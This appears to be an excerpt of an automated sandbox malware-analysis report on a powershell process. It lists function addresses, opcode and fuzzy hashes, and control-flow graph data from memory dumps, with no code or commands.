                                                • Opcode ID: d25ffef01bd92184da78942e1bcd6a367ba20cf4ffca2b02b28d984685acdf0e
                                                • Instruction ID: 8e09512f697aac64d5eb713da4fcce746ee644036b9eb73493a91660a6f2ff8a
                                                • Opcode Fuzzy Hash: d25ffef01bd92184da78942e1bcd6a367ba20cf4ffca2b02b28d984685acdf0e
                                                • Instruction Fuzzy Hash: F0012832B0EA891FEB55DAA850A09F9BBE2EF58321F1800BFC05DDB193C92558098351
                                                Function 00007FFD9B8B33A5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1766766147.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7ffd9b8b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                                • Instruction ID: d32098309b1a6811cd9a6615f808be0c1925d9f0fe18ef4f00fb21267d00c869
                                                • Opcode Fuzzy Hash: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                                • Instruction Fuzzy Hash: 0401A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E881CB41
                                                Function 00007FFD9B982DC2 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1767052834.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7ffd9b980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2692ad9e322ad0c9fbd91898679f6db353be5e8344f9b0e9935620a9a5139eed
                                                • Instruction ID: 090d1553240060023d88f8a6c0daac1a3861e33318e2bc35d66533298a0e6ff2
                                                • Opcode Fuzzy Hash: 2692ad9e322ad0c9fbd91898679f6db353be5e8344f9b0e9935620a9a5139eed
                                                • Instruction Fuzzy Hash: CEF0E232B0EA880FEB15E6ACA0A4AE8BBE1EF58324F1800BFC05DD61D3D92904458360

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:5
                                                Total number of Limit Nodes:1
                                                execution_graph 9496 7ffd9babd4f9 9498 7ffd9babd50f 9496->9498 9497 7ffd9babd552 9498->9497 9499 7ffd9babd67d CreateFileW 9498->9499 9500 7ffd9babd6de 9499->9500

                                                Executed Functions

                                                Function 00007FFD9BAB6D80 Relevance: 3.8, Strings: 2, Instructions: 1292COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 7ffd9bab6d80-7ffd9babc3c0 5 7ffd9babc3cc-7ffd9babc403 0->5 6 7ffd9babc3c2-7ffd9babc3c7 call 7ffd9bab6de0 0->6 9 7ffd9babc409-7ffd9babc414 5->9 10 7ffd9babc5f4-7ffd9babc609 5->10 6->5 11 7ffd9babc416-7ffd9babc41e 9->11 12 7ffd9babc482-7ffd9babc487 9->12 17 7ffd9babc60b-7ffd9babc612 10->17 18 7ffd9babc613-7ffd9babc65e 10->18 11->10 13 7ffd9babc424-7ffd9babc439 11->13 14 7ffd9babc489-7ffd9babc495 12->14 15 7ffd9babc4f3-7ffd9babc4fd 12->15 21 7ffd9babc43b-7ffd9babc460 13->21 22 7ffd9babc462-7ffd9babc46d 13->22 14->10 23 7ffd9babc49b-7ffd9babc4ae 14->23 19 7ffd9babc51f-7ffd9babc527 15->19 20 7ffd9babc4ff-7ffd9babc51d call 7ffd9bab6e00 15->20 17->18 44 7ffd9babc67b-7ffd9babc68c 18->44 45 7ffd9babc660-7ffd9babc666 18->45 27 7ffd9babc52a-7ffd9babc535 19->27 20->19 21->22 29 7ffd9babc4b0-7ffd9babc4b3 21->29 22->10 26 7ffd9babc473-7ffd9babc480 22->26 23->27 26->11 26->12 27->10 30 7ffd9babc53b-7ffd9babc556 27->30 34 7ffd9babc4b5 29->34 35 7ffd9babc4bf-7ffd9babc4c7 29->35 30->10 33 7ffd9babc55c-7ffd9babc56f 30->33 33->10 39 7ffd9babc575-7ffd9babc586 33->39 34->35 35->10 36 7ffd9babc4cd-7ffd9babc4f2 35->36 39->10 43 7ffd9babc588-7ffd9babc597 39->43 46 7ffd9babc599-7ffd9babc5a4 43->46 47 7ffd9babc5e2-7ffd9babc5f3 43->47 50 7ffd9babc68e-7ffd9babc699 44->50 51 7ffd9babc69d-7ffd9babc6c0 44->51 48 7ffd9babc668-7ffd9babc679 45->48 49 7ffd9babc6c1-7ffd9babc73a 45->49 46->47 57 7ffd9babc5a6-7ffd9babc5dd call 7ffd9bab6e00 46->57 48->44 48->45 65 7ffd9babc73c-7ffd9babc74c 49->65 66 7ffd9babc74e-7ffd9babc75f 49->66 57->47 65->65 65->66 68 7ffd9babc770-7ffd9babc7a1 66->68 69 7ffd9babc761-7ffd9babc76f 66->69 74 7ffd9babc7f7-7ffd9babc7fe 68->74 75 7ffd9babc7a3-7ffd9babc7a9 68->75 69->68 76 7ffd9babc800-7ffd9babc801 74->76 77 7ffd9babc83f-7ffd9babc868 74->77 75->74 78 7ffd9babc7ab-7ffd9babc7ac 75->78 79 7ffd9babc804-7ffd9babc807 76->79 80 7ffd9babc7af-7ffd9babc7b2 78->80 81 7ffd9babc869-7ffd9babc9b8 79->81 82 7ffd9babc809-7ffd9babc81a 79->82 80->81 84 7ffd9babc7b8-7ffd9babc7c8 80->84 105 7ffd9babc9ba-7ffd9babca2e call 7ffd9bab4620 81->105 106 7ffd9babca2f-7ffd9babcb2c 81->106 85 7ffd9babc836-7ffd9babc83d 82->85 86 7ffd9babc81c-7ffd9babc822 82->86 87 7ffd9babc7ca-7ffd9babc7ec 84->87 88 7ffd9babc7f0-7ffd9babc7f5 84->88 85->77 85->79 86->81 90 7ffd9babc824-7ffd9babc832 86->90 87->88 88->74 88->80 90->85 105->106 126 7ffd9babcb33-7ffd9babcb93 106->126 127 7ffd9babcb9a-7ffd9babcbb6 126->127 129 7ffd9babcbb8-7ffd9babcbba 127->129 130 7ffd9babcbbc-7ffd9babcbd5 127->130 131 7ffd9babcbd7-7ffd9babcbe5 129->131 130->131 133 7ffd9babcbeb-7ffd9babcc71 call 7ffd9bab7be8 131->133 134 7ffd9babcc72-7ffd9babcc9e 131->134 133->134 137 7ffd9babcd58-7ffd9babcd98 134->137 138 7ffd9babcca4-7ffd9babcd57 call 7ffd9bab7b98 134->138 147 7ffd9babce89-7ffd9babce97 call 7ffd9babcf2e 137->147 148 7ffd9babcd9e-7ffd9babcdac 137->148 138->137 162 7ffd9babceaa-7ffd9babceb5 147->162 163 7ffd9babce99-7ffd9babcea9 147->163 151 7ffd9babcdb2-7ffd9babcdbd 148->151 152 7ffd9babce41-7ffd9babce6f 148->152 165 7ffd9babce82-7ffd9babce86 152->165 166 7ffd9babce71-7ffd9babce81 152->166 168 7ffd9babceb7-7ffd9babcefb call 7ffd9bab2ed8 162->168 169 7ffd9babcf0d-7ffd9babcf2d 162->169 163->162 165->147 166->165 168->169
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ZM_H$d
                                                • API String ID: 0-3932459425
                                                • Opcode ID: 2d7c6ab266aee9160495a2b060b6e57b040f0bae764e8314a08d21f1434009b7
                                                • Instruction ID: 6b946636a6493f1ad7bad025611ef7c72f8c44618eb7617460f5845b13a37ba7
                                                • Opcode Fuzzy Hash: 2d7c6ab266aee9160495a2b060b6e57b040f0bae764e8314a08d21f1434009b7
                                                • Instruction Fuzzy Hash: 6E828A31B1EA8D4FE769DB6888659B577D1FF55310F0402BED09EC71A7EE28A8438780
                                                Function 00007FFD9BABC93B Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ZM_H
                                                • API String ID: 0-3096618608
                                                • Opcode ID: 9aff4c675a3d817d0c645530905f44588a584f1a2cbbd57365dede246fccc881
                                                • Instruction ID: 47fb9315b613fe0349cbbd4dadb6cea566ba001966bafd32963175b70bce689f
                                                • Opcode Fuzzy Hash: 9aff4c675a3d817d0c645530905f44588a584f1a2cbbd57365dede246fccc881
                                                • Instruction Fuzzy Hash: 04E16A72B1E9890FE758DB7C446A5F977D1EF59210B0542FED09ECB2A7ED2858028740
                                                Function 00007FFD9BABCA35 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ZM_H
                                                • API String ID: 0-3096618608
                                                • Opcode ID: dbf90a2c18cf7d1c3276be2fc9ad3b8c5d821f96ce337db92e1b4e2e8dcf1d10
                                                • Instruction ID: a0900a1f240cbda02eb045e64b859e576d6266bf5a27cdc179a69182a73eca72
                                                • Opcode Fuzzy Hash: dbf90a2c18cf7d1c3276be2fc9ad3b8c5d821f96ce337db92e1b4e2e8dcf1d10
                                                • Instruction Fuzzy Hash: AFB16972B1E9890FE758DB7C047A5B97BD1EF59210B0546FED09ECB6E3ED2858028740
                                                Function 00007FFD9BABCA90 Relevance: .3, Instructions: 330COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3c3ec2fd961d6a4bd45225f78a71009be90b53771e33732020d96c64c8e2ee6
                                                • Instruction ID: d9a036d0c5cd730049e5465db4edffaa004335b4e3d604eaf32293dbd06d0d2f
                                                • Opcode Fuzzy Hash: b3c3ec2fd961d6a4bd45225f78a71009be90b53771e33732020d96c64c8e2ee6
                                                • Instruction Fuzzy Hash: CBA16872B1E9890FE7589B7C047A5B97BD1EF59210B0946FED09ECB6E3ED1868028740
                                                Function 00007FFD9BABD4F9 Relevance: 1.7, APIs: 1, Instructions: 246fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: d39c6acd0667e8212c428686329afebc3c18da2bf765acd8ea3ace8569bcd345
                                                • Instruction ID: 25031ce322ee679d86215a2db69964959519fb544fce72e486a70c9c9d4e5596
                                                • Opcode Fuzzy Hash: d39c6acd0667e8212c428686329afebc3c18da2bf765acd8ea3ace8569bcd345
                                                • Instruction Fuzzy Hash: F5713B71A0DA4C4FD758DF6C9859AA97BE0FF59314F0402BEE09DD32A2DF74A8018B81
                                                Function 00007FFD9BB815DD Relevance: .7, Instructions: 668COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 351 7ffd9bb815dd-7ffd9bb815e7 352 7ffd9bb815ee-7ffd9bb815ff 351->352 353 7ffd9bb815e9 351->353 354 7ffd9bb81601 352->354 355 7ffd9bb81606-7ffd9bb81617 352->355 353->352 356 7ffd9bb815eb 353->356 354->355 357 7ffd9bb81603 354->357 358 7ffd9bb8161e-7ffd9bb8162f 355->358 359 7ffd9bb81619 355->359 356->352 357->355 361 7ffd9bb81631 358->361 362 7ffd9bb81636-7ffd9bb81647 358->362 359->358 360 7ffd9bb8161b 359->360 360->358 361->362 363 7ffd9bb81633 361->363 364 7ffd9bb8164e-7ffd9bb8170f 362->364 365 7ffd9bb81649 362->365 363->362 369 7ffd9bb81926-7ffd9bb81984 364->369 370 7ffd9bb81715-7ffd9bb8171f 364->370 365->364 366 7ffd9bb8164b 365->366 366->364 388 7ffd9bb819af-7ffd9bb819bb 369->388 389 7ffd9bb81986-7ffd9bb819ad 369->389 371 7ffd9bb81721-7ffd9bb81739 370->371 372 7ffd9bb8173b-7ffd9bb81748 370->372 371->372 379 7ffd9bb8174e-7ffd9bb81751 372->379 380 7ffd9bb818bb-7ffd9bb818c5 372->380 379->380 382 7ffd9bb81757-7ffd9bb8175f 379->382 383 7ffd9bb818d8-7ffd9bb81923 380->383 384 7ffd9bb818c7-7ffd9bb818d7 380->384 382->369 386 7ffd9bb81765-7ffd9bb8176f 382->386 383->369 390 7ffd9bb81771-7ffd9bb8177f 386->390 391 7ffd9bb81789-7ffd9bb8178f 386->391 395 7ffd9bb819c6-7ffd9bb819d7 388->395 389->388 390->391 399 7ffd9bb81781-7ffd9bb81787 390->399 391->380 394 7ffd9bb81795-7ffd9bb81798 391->394 396 7ffd9bb817e1 394->396 397 7ffd9bb8179a-7ffd9bb817ad 394->397 407 7ffd9bb819e0-7ffd9bb819ef 395->407 408 7ffd9bb819d9 395->408 401 7ffd9bb817e3-7ffd9bb817e5 396->401 397->369 409 7ffd9bb817b3-7ffd9bb817bd 397->409 399->391 401->380 404 7ffd9bb817eb-7ffd9bb817ee 401->404 410 7ffd9bb817f0-7ffd9bb817f9 404->410 411 7ffd9bb81805-7ffd9bb81809 404->411 414 7ffd9bb819f1 407->414 415 7ffd9bb819f8-7ffd9bb81a75 407->415 408->407 412 7ffd9bb817bf-7ffd9bb817d4 409->412 413 7ffd9bb817d6-7ffd9bb817df 409->413 410->411 411->380 419 7ffd9bb8180f-7ffd9bb81815 411->419 412->413 413->401 414->415 423 7ffd9bb81ae8-7ffd9bb81af2 415->423 424 7ffd9bb81a77-7ffd9bb81a87 415->424 421 7ffd9bb81831-7ffd9bb81837 419->421 422 7ffd9bb81817-7ffd9bb81824 419->422 430 7ffd9bb81853-7ffd9bb81890 421->430 431 7ffd9bb81839-7ffd9bb81846 421->431 422->421 433 7ffd9bb81826-7ffd9bb8182f 422->433 427 7ffd9bb81af4-7ffd9bb81af9 423->427 428 7ffd9bb81afc-7ffd9bb81b41 423->428 435 7ffd9bb81a94-7ffd9bb81aaa 424->435 436 7ffd9bb81a89-7ffd9bb81a92 424->436 434 7ffd9bb81afa-7ffd9bb81afb 427->434 454 7ffd9bb81892-7ffd9bb818a7 430->454 455 7ffd9bb818a9-7ffd9bb818ba 430->455 431->430 441 7ffd9bb81848-7ffd9bb81851 431->441 433->421 435->434 447 7ffd9bb81aac-7ffd9bb81ae5 435->447 436->435 441->430 447->423 454->455
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2428856960.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bb80000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 863376df2adf84df008f0e9c6cb30eb196b1e3442ab3111826ff3b40989d9951
                                                • Instruction ID: c813e1455bb6128ee49d92a66c02d9e914afeff6c52178782489bb1614b5a98c
                                                • Opcode Fuzzy Hash: 863376df2adf84df008f0e9c6cb30eb196b1e3442ab3111826ff3b40989d9951
                                                • Instruction Fuzzy Hash: 09120661A0FBC90FE3A6977858755B47BE1EF5A214F0A01FFD089C71E3D9289906C392

                                                Non-executed Functions

                                                Function 00007FFD9BABEDE0 Relevance: 7.2, Strings: 4, Instructions: 2215COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: uU_I$xJ_L$yJ_L$~U_I
                                                • API String ID: 0-3052503429
                                                • Opcode ID: 5976804176e1774b3e14797a0c3b07b5bb3cfea364146f7e80eb1a6a5872f85a
                                                • Instruction ID: a548759ca572cd96242c978b5cc97d58376bfae6f0165f9169fc64b98d79986a
                                                • Opcode Fuzzy Hash: 5976804176e1774b3e14797a0c3b07b5bb3cfea364146f7e80eb1a6a5872f85a
                                                • Instruction Fuzzy Hash: CAE2E531B1A90E4FEBA8DB6CC4A5A7473D1EF94350B5601BAD00EC72B6DE69FD428740
                                                Function 00007FFD9BACDD80 Relevance: 2.1, Strings: 1, Instructions: 849COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1143 7ffd9bacdd80-7ffd9bacddc1 call 7ffd9babed68 1147 7ffd9bacddd5-7ffd9bacdde0 1143->1147 1148 7ffd9bacddc3-7ffd9bacddd3 1143->1148 1149 7ffd9bacdde6-7ffd9bacddea 1147->1149 1150 7ffd9bace123-7ffd9bace126 1147->1150 1148->1147 1151 7ffd9bacddfb-7ffd9bacde03 1149->1151 1152 7ffd9bacddec-7ffd9bacddf1 1149->1152 1153 7ffd9bace13c-7ffd9bace14f 1150->1153 1154 7ffd9bace128-7ffd9bace13a call 7ffd9babeb38 1150->1154 1156 7ffd9bacde09-7ffd9bacde26 1151->1156 1157 7ffd9bace173-7ffd9bace189 1151->1157 1152->1151 1154->1153 1162 7ffd9bacde2c-7ffd9bacdea0 call 7ffd9babed00 1156->1162 1163 7ffd9bace001-7ffd9bace016 1156->1163 1164 7ffd9bace18b-7ffd9bace192 1157->1164 1165 7ffd9bace193-7ffd9bace1d8 1157->1165 1199 7ffd9bacdec8 1162->1199 1200 7ffd9bacdea2-7ffd9bacdea3 1162->1200 1170 7ffd9bace018-7ffd9bace01e 1163->1170 1171 7ffd9bace093-7ffd9bace09e 1163->1171 1164->1165 1186 7ffd9bace1da-7ffd9bace1ef 1165->1186 1187 7ffd9bace1f2-7ffd9bace230 1165->1187 1176 7ffd9bace032-7ffd9bace041 call 7ffd9babed78 1170->1176 1177 7ffd9bace020-7ffd9bace030 1170->1177 1174 7ffd9bace0af-7ffd9bace0b6 1171->1174 1175 7ffd9bace0a0-7ffd9bace0a5 1171->1175 1174->1157 1179 7ffd9bace0bc-7ffd9bace0fc call 7ffd9babede8 1174->1179 1175->1174 1185 7ffd9bace045-7ffd9bace051 1176->1185 1177->1176 1196 7ffd9bace112-7ffd9bace121 call 7ffd9babed38 1179->1196 1197 7ffd9bace0fe-7ffd9bace10d call 7ffd9babedd0 1179->1197 1185->1149 1190 7ffd9bace057 1185->1190 1186->1187 1209 7ffd9bace3ea-7ffd9bace412 1187->1209 1210 7ffd9bace236-7ffd9bace259 1187->1210 1190->1150 1196->1150 1197->1196 1205 7ffd9bacdeca-7ffd9bacdee3 1199->1205 1203 7ffd9bacdea7-7ffd9bacdeb7 1200->1203 1207 7ffd9bacdeb9-7ffd9bacdec0 1203->1207 1208 7ffd9bacdec6 1203->1208 1213 7ffd9bacdf05-7ffd9bacdf08 1205->1213 1214 7ffd9bacdee5-7ffd9bacdf00 call 7ffd9babed70 1205->1214 1207->1203 1212 7ffd9bacdec2-7ffd9bacdec4 1207->1212 1208->1205 1230 7ffd9bace486-7ffd9bace494 1209->1230 1231 7ffd9bace414-7ffd9bace467 1209->1231 1232 7ffd9bace3c9-7ffd9bace3e4 1210->1232 1233 7ffd9bace25f-7ffd9bace27d 1210->1233 1212->1208 1218 7ffd9bacdf0a-7ffd9bacdf24 1213->1218 1219 7ffd9bacdf83-7ffd9bacdf8b 1213->1219 1214->1213 1228 7ffd9bacdf49-7ffd9bacdf4e 1218->1228 1229 7ffd9bacdf26-7ffd9bacdf42 1218->1229 1221 7ffd9bacdf99-7ffd9bacdfaa call 7ffd9babed60 1219->1221 1222 7ffd9bacdf8d-7ffd9bacdf97 call 7ffd9bac7c70 1219->1222 1236 7ffd9bacdfda-7ffd9bacdfec call 7ffd9babed90 1221->1236 1237 7ffd9bacdfac-7ffd9bacdfc6 1221->1237 1222->1221 1239 7ffd9bacdff0-7ffd9bacdffd 1222->1239 1228->1219 1242 7ffd9bacdf44-7ffd9bacdf47 1229->1242 1243 7ffd9bacdf50-7ffd9bacdf62 1229->1243 1231->1230 1268 7ffd9bace469-7ffd9bace484 1231->1268 1232->1209 1232->1210 1233->1232 1259 7ffd9bace283-7ffd9bace2ee 1233->1259 1236->1239 1247 7ffd9bace05c-7ffd9bace061 1237->1247 1248 7ffd9bacdfcc-7ffd9bacdfd8 1237->1248 1239->1185 1254 7ffd9bacdfff-7ffd9bace08e call 7ffd9babed58 1239->1254 1249 7ffd9bacdf64-7ffd9bacdf7d 1242->1249 1243->1249 1247->1150 1248->1239 1249->1219 1261 7ffd9bace150-7ffd9bace172 1249->1261 1254->1150 1276 7ffd9bace32b-7ffd9bace36e 1259->1276 1277 7ffd9bace2f0-7ffd9bace329 1259->1277 1261->1157 1268->1230 1283 7ffd9bace3c0-7ffd9bace3c8 call 7ffd9bace495 1276->1283 1284 7ffd9bace370-7ffd9bace398 1276->1284 1277->1276 1283->1232 1290 7ffd9bace39a-7ffd9bace39f 1284->1290 1291 7ffd9bace3a6-7ffd9bace3be 1284->1291 1290->1291 1291->1283 1291->1284
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2427582749.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \L_H
                                                • API String ID: 0-2621150107
                                                • Opcode ID: 408e92291795f893e0733d91cfb75457ec282012befc2e550ed76c99058eeed0
                                                • Instruction ID: a09e3c1556dd15d3927232663e1e5d7a0adabc9326f05183c81994615b78f70f
                                                • Opcode Fuzzy Hash: 408e92291795f893e0733d91cfb75457ec282012befc2e550ed76c99058eeed0
                                                • Instruction Fuzzy Hash: 5342E031B19A4D4FEBA4EB5C8864A7973E1FFA8350F0501BAE44DC72A6DE64FC418781